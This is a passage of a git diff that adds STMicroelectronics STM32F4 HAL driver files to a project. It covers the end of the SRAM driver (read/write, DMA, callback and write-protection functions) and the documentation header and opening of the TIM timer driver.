HAL status + */ +HAL_StatusTypeDef HAL_SRAM_DeInit(SRAM_HandleTypeDef *hsram) +{ +#if (USE_HAL_SRAM_REGISTER_CALLBACKS == 1) + if(hsram->MspDeInitCallback == NULL) + { + hsram->MspDeInitCallback = HAL_SRAM_MspDeInit; + } + + /* DeInit the low level hardware */ + hsram->MspDeInitCallback(hsram); +#else + /* De-Initialize the low level hardware (MSP) */ + HAL_SRAM_MspDeInit(hsram); +#endif + + /* Configure the SRAM registers with their reset values */ + FMC_NORSRAM_DeInit(hsram->Instance, hsram->Extended, hsram->Init.NSBank); + + hsram->State = HAL_SRAM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief SRAM MSP Init. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval None + */ +__weak void HAL_SRAM_MspInit(SRAM_HandleTypeDef *hsram) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsram); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SRAM_MspInit could be implemented in the user file + */ +} + +/** + * @brief SRAM MSP DeInit. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval None + */ +__weak void HAL_SRAM_MspDeInit(SRAM_HandleTypeDef *hsram) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsram); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SRAM_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief DMA transfer complete callback. + * @param hdma pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval None + */ +__weak void HAL_SRAM_DMA_XferCpltCallback(DMA_HandleTypeDef *hdma) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SRAM_DMA_XferCpltCallback could be implemented in the user file + */ +} + +/** + * @brief DMA transfer complete error callback. + * @param hdma pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval None + */ +__weak void HAL_SRAM_DMA_XferErrorCallback(DMA_HandleTypeDef *hdma) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_SRAM_DMA_XferErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup SRAM_Exported_Functions_Group2 Input and Output functions + * @brief Input Output and memory control functions + * + @verbatim + ============================================================================== + ##### SRAM Input and Output functions ##### + ============================================================================== + [..] + This section provides functions allowing to use and control the SRAM memory + +@endverbatim + * @{ + */ + +/** + * @brief Reads 8-bit buffer from SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Read_8b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint8_t *pDstBuffer, uint32_t BufferSize) +{ + __IO uint8_t * pSramAddress = (uint8_t *)pAddress; + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Read data from memory */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint8_t *)pSramAddress; + pDstBuffer++; + pSramAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Writes 8-bit buffer to SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Write_8b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint8_t *pSrcBuffer, uint32_t BufferSize) +{ + __IO uint8_t * pSramAddress = (uint8_t *)pAddress; + + /* Check the SRAM controller state */ + if(hsram->State == HAL_SRAM_STATE_PROTECTED) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint8_t *)pSramAddress = *pSrcBuffer; + pSrcBuffer++; + pSramAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Reads 16-bit buffer from SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Read_16b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint16_t *pDstBuffer, uint32_t BufferSize) +{ + __IO uint16_t * pSramAddress = (uint16_t *)pAddress; + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Read data from memory */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint16_t *)pSramAddress; + pDstBuffer++; + pSramAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Writes 16-bit buffer to SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Write_16b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint16_t *pSrcBuffer, uint32_t BufferSize) +{ + __IO uint16_t * pSramAddress = (uint16_t *)pAddress; + + /* Check the SRAM controller state */ + if(hsram->State == HAL_SRAM_STATE_PROTECTED) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint16_t *)pSramAddress = *pSrcBuffer; + pSrcBuffer++; + pSramAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Reads 32-bit buffer from SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Read_32b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint32_t *pDstBuffer, uint32_t BufferSize) +{ + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Read data from memory */ + for(; BufferSize != 0U; BufferSize--) + { + *pDstBuffer = *(__IO uint32_t *)pAddress; + pDstBuffer++; + pAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Writes 32-bit buffer to SRAM memory. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Write_32b(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint32_t *pSrcBuffer, uint32_t BufferSize) +{ + /* Check the SRAM controller state */ + if(hsram->State == HAL_SRAM_STATE_PROTECTED) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Write data to memory */ + for(; BufferSize != 0U; BufferSize--) + { + *(__IO uint32_t *)pAddress = *pSrcBuffer; + pSrcBuffer++; + pAddress++; + } + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Reads a Words data from the SRAM memory using DMA transfer. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to read start address + * @param pDstBuffer Pointer to destination buffer + * @param BufferSize Size of the buffer to read from memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Read_DMA(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint32_t *pDstBuffer, uint32_t BufferSize) +{ + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Configure DMA user callbacks */ + hsram->hdma->XferCpltCallback = HAL_SRAM_DMA_XferCpltCallback; + hsram->hdma->XferErrorCallback = HAL_SRAM_DMA_XferErrorCallback; + + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hsram->hdma, (uint32_t)pAddress, (uint32_t)pDstBuffer, (uint32_t)BufferSize); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Writes a Words data buffer to SRAM memory using DMA transfer. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @param pAddress Pointer to write start address + * @param pSrcBuffer Pointer to source buffer to write + * @param BufferSize Size of the buffer to write to memory + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_Write_DMA(SRAM_HandleTypeDef *hsram, uint32_t *pAddress, uint32_t *pSrcBuffer, uint32_t BufferSize) +{ + /* Check the SRAM controller state */ + if(hsram->State == HAL_SRAM_STATE_PROTECTED) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Configure DMA user callbacks */ + hsram->hdma->XferCpltCallback = HAL_SRAM_DMA_XferCpltCallback; + hsram->hdma->XferErrorCallback = HAL_SRAM_DMA_XferErrorCallback; + + /* Enable the DMA Stream */ + HAL_DMA_Start_IT(hsram->hdma, (uint32_t)pSrcBuffer, (uint32_t)pAddress, (uint32_t)BufferSize); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +#if (USE_HAL_SRAM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User SRAM Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hsram : SRAM handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SRAM_MSP_INIT_CB_ID SRAM MspInit callback ID + * @arg @ref HAL_SRAM_MSP_DEINIT_CB_ID SRAM MspDeInit callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_SRAM_RegisterCallback (SRAM_HandleTypeDef *hsram, HAL_SRAM_CallbackIDTypeDef CallbackId, pSRAM_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SRAM_StateTypeDef state; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hsram); + + state = hsram->State; + if((state == HAL_SRAM_STATE_READY) || (state == HAL_SRAM_STATE_RESET) || (state == HAL_SRAM_STATE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SRAM_MSP_INIT_CB_ID : + hsram->MspInitCallback = pCallback; + break; + case HAL_SRAM_MSP_DEINIT_CB_ID : + hsram->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsram); + return status; +} + +/** + * @brief Unregister a User SRAM Callback + * SRAM Callback is redirected to the weak (surcharged) predefined callback + * @param hsram : SRAM handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_SRAM_MSP_INIT_CB_ID SRAM MspInit callback ID + * @arg @ref HAL_SRAM_MSP_DEINIT_CB_ID SRAM MspDeInit callback ID + * @arg @ref HAL_SRAM_DMA_XFER_CPLT_CB_ID SRAM DMA Xfer Complete callback ID + * @arg @ref HAL_SRAM_DMA_XFER_ERR_CB_ID SRAM DMA Xfer Error callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_SRAM_UnRegisterCallback (SRAM_HandleTypeDef *hsram, HAL_SRAM_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SRAM_StateTypeDef state; + + /* Process locked */ + __HAL_LOCK(hsram); + + state = hsram->State; + if((state == HAL_SRAM_STATE_READY) || (state == HAL_SRAM_STATE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SRAM_MSP_INIT_CB_ID : + hsram->MspInitCallback = HAL_SRAM_MspInit; + break; + case HAL_SRAM_MSP_DEINIT_CB_ID : + hsram->MspDeInitCallback = HAL_SRAM_MspDeInit; + break; + case HAL_SRAM_DMA_XFER_CPLT_CB_ID : + hsram->DmaXferCpltCallback = HAL_SRAM_DMA_XferCpltCallback; + break; + case HAL_SRAM_DMA_XFER_ERR_CB_ID : + hsram->DmaXferErrorCallback = HAL_SRAM_DMA_XferErrorCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if(state == HAL_SRAM_STATE_RESET) + { + switch (CallbackId) + { + case HAL_SRAM_MSP_INIT_CB_ID : + hsram->MspInitCallback = HAL_SRAM_MspInit; + break; + case HAL_SRAM_MSP_DEINIT_CB_ID : + hsram->MspDeInitCallback = HAL_SRAM_MspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsram); + return status; +} + +/** + * @brief Register a User SRAM Callback for DMA transfers + * To be used instead of the weak (surcharged) predefined callback + * @param hsram : SRAM handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_SRAM_DMA_XFER_CPLT_CB_ID SRAM DMA Xfer Complete callback ID + * @arg @ref HAL_SRAM_DMA_XFER_ERR_CB_ID SRAM DMA Xfer Error callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_SRAM_RegisterDmaCallback(SRAM_HandleTypeDef *hsram, HAL_SRAM_CallbackIDTypeDef CallbackId, pSRAM_DmaCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_SRAM_StateTypeDef state; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hsram); + + state = hsram->State; + if((state == HAL_SRAM_STATE_READY) || (state == HAL_SRAM_STATE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_SRAM_DMA_XFER_CPLT_CB_ID : + hsram->DmaXferCpltCallback = pCallback; + break; + case HAL_SRAM_DMA_XFER_ERR_CB_ID : + hsram->DmaXferErrorCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hsram); + return status; +} +#endif +/** + * @} + */ + +/** @defgroup SRAM_Exported_Functions_Group3 Control functions + * @brief management functions + * +@verbatim + ============================================================================== + ##### SRAM Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the SRAM interface. + +@endverbatim + * @{ + */ + +/** + * @brief Enables dynamically SRAM write operation. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_WriteOperation_Enable(SRAM_HandleTypeDef *hsram) +{ + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Enable write operation */ + FMC_NORSRAM_WriteOperation_Enable(hsram->Instance, hsram->Init.NSBank); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @brief Disables dynamically SRAM write operation. + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SRAM_WriteOperation_Disable(SRAM_HandleTypeDef *hsram) +{ + /* Process Locked */ + __HAL_LOCK(hsram); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_BUSY; + + /* Disable write operation */ + FMC_NORSRAM_WriteOperation_Disable(hsram->Instance, hsram->Init.NSBank); + + /* Update the SRAM controller state */ + hsram->State = HAL_SRAM_STATE_PROTECTED; + + /* Process unlocked */ + __HAL_UNLOCK(hsram); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup SRAM_Exported_Functions_Group4 State functions + * @brief Peripheral State functions + * +@verbatim + ============================================================================== + ##### SRAM State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the SRAM controller + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Returns the SRAM controller state + * @param hsram pointer to a SRAM_HandleTypeDef structure that contains + * the configuration information for SRAM module. + * @retval HAL state + */ +HAL_SRAM_StateTypeDef HAL_SRAM_GetState(SRAM_HandleTypeDef *hsram) +{ + return hsram->State; +} +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F427xx || STM32F437xx ||\ + STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx || STM32F412Zx ||\ + STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ +#endif /* HAL_SRAM_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim.c new file mode 100644 index 000000000..f3d46cdd3 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_tim.c @@ -0,0 +1,7626 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_tim.c + * @author MCD Application Team + * @brief TIM HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Timer (TIM) peripheral: + * + TIM Time Base Initialization + * + TIM Time Base Start + * + TIM Time Base Start Interruption + * + TIM Time Base Start DMA + * + TIM Output Compare/PWM Initialization + * + TIM Output Compare/PWM Channel Configuration + * + TIM Output Compare/PWM Start + * + TIM Output Compare/PWM Start Interruption + * + TIM Output Compare/PWM Start DMA + * + TIM Input Capture Initialization + * + TIM Input Capture Channel Configuration + * + TIM Input Capture Start + * + TIM Input Capture Start Interruption + * + TIM Input Capture Start DMA + * + TIM One Pulse Initialization + * + TIM One Pulse Channel Configuration + * + TIM One Pulse Start + * + TIM Encoder Interface Initialization + * + TIM Encoder Interface Start + * + TIM Encoder Interface Start Interruption + * + TIM Encoder Interface Start DMA + * + Commutation Event configuration with Interruption and DMA + * + TIM OCRef clear configuration + * + TIM External Clock configuration + @verbatim + ============================================================================== + ##### TIMER Generic features ##### + ============================================================================== + [..] The Timer features include: + (#) 16-bit up, down, up/down auto-reload counter. + (#) 16-bit programmable prescaler allowing dividing (also on the fly) the + counter clock frequency either by any factor between 1 and 65536. + (#) Up to 4 independent channels for: + (++) Input Capture + (++) Output Compare + (++) PWM generation (Edge and Center-aligned Mode) + (++) One-pulse mode output + (#) Synchronization circuit to control the timer with external signals and to interconnect + several timers together. + (#) Supports incremental encoder for positioning purposes + + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Initialize the TIM low level resources by implementing the following functions + depending on the selected feature: + (++) Time Base : HAL_TIM_Base_MspInit() + (++) Input Capture : HAL_TIM_IC_MspInit() + (++) Output Compare : HAL_TIM_OC_MspInit() + (++) PWM generation : HAL_TIM_PWM_MspInit() + (++) One-pulse mode output : HAL_TIM_OnePulse_MspInit() + (++) Encoder mode output : HAL_TIM_Encoder_MspInit() + + (#) Initialize the TIM low level resources : + (##) Enable the TIM interface clock using __HAL_RCC_TIMx_CLK_ENABLE(); + (##) TIM pins configuration + (+++) Enable the clock for the TIM GPIOs using the following function: + __HAL_RCC_GPIOx_CLK_ENABLE(); + (+++) Configure these TIM pins in Alternate function mode using HAL_GPIO_Init(); + + (#) The external Clock can be configured, if needed (the default clock is the + internal clock from the APBx), using the following function: + HAL_TIM_ConfigClockSource, the clock configuration should be done before + any start function. + + (#) Configure the TIM in the desired functioning mode using one of the + Initialization function of this driver: + (++) HAL_TIM_Base_Init: to use the Timer to generate a simple time base + (++) HAL_TIM_OC_Init and HAL_TIM_OC_ConfigChannel: to use the Timer to generate an + Output Compare signal. + (++) HAL_TIM_PWM_Init and HAL_TIM_PWM_ConfigChannel: to use the Timer to generate a + PWM signal. + (++) HAL_TIM_IC_Init and HAL_TIM_IC_ConfigChannel: to use the Timer to measure an + external signal. + (++) HAL_TIM_OnePulse_Init and HAL_TIM_OnePulse_ConfigChannel: to use the Timer + in One Pulse Mode. + (++) HAL_TIM_Encoder_Init: to use the Timer Encoder Interface. + + (#) Activate the TIM peripheral using one of the start functions depending from the feature used: + (++) Time Base : HAL_TIM_Base_Start(), HAL_TIM_Base_Start_DMA(), HAL_TIM_Base_Start_IT() + (++) Input Capture : HAL_TIM_IC_Start(), HAL_TIM_IC_Start_DMA(), HAL_TIM_IC_Start_IT() + (++) Output Compare : HAL_TIM_OC_Start(), HAL_TIM_OC_Start_DMA(), HAL_TIM_OC_Start_IT() + (++) PWM generation : HAL_TIM_PWM_Start(), HAL_TIM_PWM_Start_DMA(), HAL_TIM_PWM_Start_IT() + (++) One-pulse mode output : HAL_TIM_OnePulse_Start(), HAL_TIM_OnePulse_Start_IT() + (++) Encoder mode output : HAL_TIM_Encoder_Start(), HAL_TIM_Encoder_Start_DMA(), HAL_TIM_Encoder_Start_IT(). + + (#) The DMA Burst is managed with the two following functions: + HAL_TIM_DMABurst_WriteStart() + HAL_TIM_DMABurst_ReadStart() + + *** Callback registration *** + ============================================= + + [..] + The compilation define USE_HAL_TIM_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function HAL_TIM_RegisterCallback() to register a callback. + HAL_TIM_RegisterCallback() takes as parameters the HAL peripheral handle, + the Callback ID and a pointer to the user callback function. + + [..] + Use function HAL_TIM_UnRegisterCallback() to reset a callback to the default + weak function. + HAL_TIM_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + + [..] + These functions allow to register/unregister following callbacks: + (+) Base_MspInitCallback : TIM Base Msp Init Callback. + (+) Base_MspDeInitCallback : TIM Base Msp DeInit Callback. + (+) IC_MspInitCallback : TIM IC Msp Init Callback. + (+) IC_MspDeInitCallback : TIM IC Msp DeInit Callback. + (+) OC_MspInitCallback : TIM OC Msp Init Callback. + (+) OC_MspDeInitCallback : TIM OC Msp DeInit Callback. + (+) PWM_MspInitCallback : TIM PWM Msp Init Callback. + (+) PWM_MspDeInitCallback : TIM PWM Msp DeInit Callback. + (+) OnePulse_MspInitCallback : TIM One Pulse Msp Init Callback. + (+) OnePulse_MspDeInitCallback : TIM One Pulse Msp DeInit Callback. + (+) Encoder_MspInitCallback : TIM Encoder Msp Init Callback. + (+) Encoder_MspDeInitCallback : TIM Encoder Msp DeInit Callback. + (+) HallSensor_MspInitCallback : TIM Hall Sensor Msp Init Callback. + (+) HallSensor_MspDeInitCallback : TIM Hall Sensor Msp DeInit Callback. + (+) PeriodElapsedCallback : TIM Period Elapsed Callback. + (+) PeriodElapsedHalfCpltCallback : TIM Period Elapsed half complete Callback. + (+) TriggerCallback : TIM Trigger Callback. + (+) TriggerHalfCpltCallback : TIM Trigger half complete Callback. + (+) IC_CaptureCallback : TIM Input Capture Callback. + (+) IC_CaptureHalfCpltCallback : TIM Input Capture half complete Callback. + (+) OC_DelayElapsedCallback : TIM Output Compare Delay Elapsed Callback. + (+) PWM_PulseFinishedCallback : TIM PWM Pulse Finished Callback. + (+) PWM_PulseFinishedHalfCpltCallback : TIM PWM Pulse Finished half complete Callback. + (+) ErrorCallback : TIM Error Callback. + (+) CommutationCallback : TIM Commutation Callback. + (+) CommutationHalfCpltCallback : TIM Commutation half complete Callback. + (+) BreakCallback : TIM Break Callback. + + [..] +By default, after the Init and when the state is HAL_TIM_STATE_RESET +all interrupt callbacks are set to the corresponding weak functions: + examples HAL_TIM_TriggerCallback(), HAL_TIM_ErrorCallback(). + + [..] + Exception done for MspInit and MspDeInit functions that are reset to the legacy weak + functionalities in the Init / DeInit only when these callbacks are null + (not registered beforehand). If not, MspInit or MspDeInit are not null, the Init / DeInit + keep and use the user MspInit / MspDeInit callbacks(registered beforehand) + + [..] + Callbacks can be registered / unregistered in HAL_TIM_STATE_READY state only. + Exception done MspInit / MspDeInit that can be registered / unregistered + in HAL_TIM_STATE_READY or HAL_TIM_STATE_RESET state, + thus registered(user) MspInit / DeInit callbacks can be used during the Init / DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_TIM_RegisterCallback() before calling DeInit or Init function. + + [..] + When The compilation define USE_HAL_TIM_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup TIM TIM + * @brief TIM HAL module driver + * @{ + */ + +#ifdef HAL_TIM_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup TIM_Private_Functions + * @{ + */ +static void TIM_OC1_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config); +static void TIM_OC3_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config); +static void TIM_OC4_SetConfig(TIM_TypeDef *TIMx, TIM_OC_InitTypeDef *OC_Config); +static void TIM_TI1_ConfigInputStage(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICFilter); +static void TIM_TI2_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter); +static void TIM_TI2_ConfigInputStage(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICFilter); +static void TIM_TI3_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter); +static void TIM_TI4_SetConfig(TIM_TypeDef *TIMx, uint32_t TIM_ICPolarity, uint32_t TIM_ICSelection, + uint32_t TIM_ICFilter); +static void TIM_ITRx_SetConfig(TIM_TypeDef *TIMx, uint32_t InputTriggerSource); +static void TIM_DMAPeriodElapsedCplt(DMA_HandleTypeDef *hdma); +static void TIM_DMAPeriodElapsedHalfCplt(DMA_HandleTypeDef *hdma); +static void TIM_DMADelayPulseCplt(DMA_HandleTypeDef *hdma); +static void TIM_DMATriggerCplt(DMA_HandleTypeDef *hdma); +static void TIM_DMATriggerHalfCplt(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef TIM_SlaveTimer_SetConfig(TIM_HandleTypeDef *htim, + TIM_SlaveConfigTypeDef *sSlaveConfig); +/** + * @} + */ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup TIM_Exported_Functions TIM Exported Functions + * @{ + */ + +/** @defgroup TIM_Exported_Functions_Group1 TIM Time Base functions + * @brief Time Base functions + * +@verbatim + ============================================================================== + ##### Time Base functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM base. + (+) De-initialize the TIM base. + (+) Start the Time Base. + (+) Stop the Time Base. + (+) Start the Time Base and enable interrupt. + (+) Stop the Time Base and disable interrupt. + (+) Start the Time Base and enable DMA transfer. + (+) Stop the Time Base and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM Time base Unit according to the specified + * parameters in the TIM_HandleTypeDef and initialize the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_Base_DeInit() before HAL_TIM_Base_Init() + * @param htim TIM Base handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Base_Init(TIM_HandleTypeDef *htim) +{ + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the 